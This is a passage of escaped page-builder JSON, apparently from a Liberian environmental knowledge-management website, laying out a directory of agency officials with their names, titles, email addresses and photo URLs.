href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"